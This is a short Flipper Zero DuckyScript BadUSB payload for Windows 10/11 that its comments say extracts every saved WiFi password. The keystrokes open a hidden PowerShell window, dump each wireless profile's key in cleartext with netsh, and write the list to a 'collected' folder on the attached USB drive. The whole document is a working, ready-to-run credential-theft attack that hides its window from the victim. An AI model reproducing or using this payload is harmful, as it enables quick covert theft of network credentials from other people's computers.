REM ============================================================================
REM  FLLC - BadUSB: Extract All WiFi Passwords
REM  Flipper Zero DuckyScript
REM ============================================================================
REM  Target: Windows 10/11
REM  Time: ~6 seconds
REM  Extracts all saved WiFi profiles and passwords to USB drive
REM ============================================================================

DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -Command "$out=''; $profiles=(netsh wlan show profiles)|Select-String 'All User Profile\s*:\s*(.*)' |%{$_.Matches.Groups[1].Value.Trim()}; foreach($p in $profiles){$r=netsh wlan show profile name=$p key=clear; $pw=($r|Select-String 'Key Content\s*:\s*(.*)'); if($pw){$k=$pw.Matches.Groups[1].Value.Trim()}else{$k='<none>'}; $out+=\"$p : $k`r`n\"}; $drives=Get-WmiObject Win32_LogicalDisk -Filter 'DriveType=2'; foreach($d in $drives){$path=$d.DeviceID+'\\collected\\wifi_passwords.txt'; try{$out|Out-File -FilePath $path -Encoding UTF8; break}catch{}}"
ENTER
DELAY 500
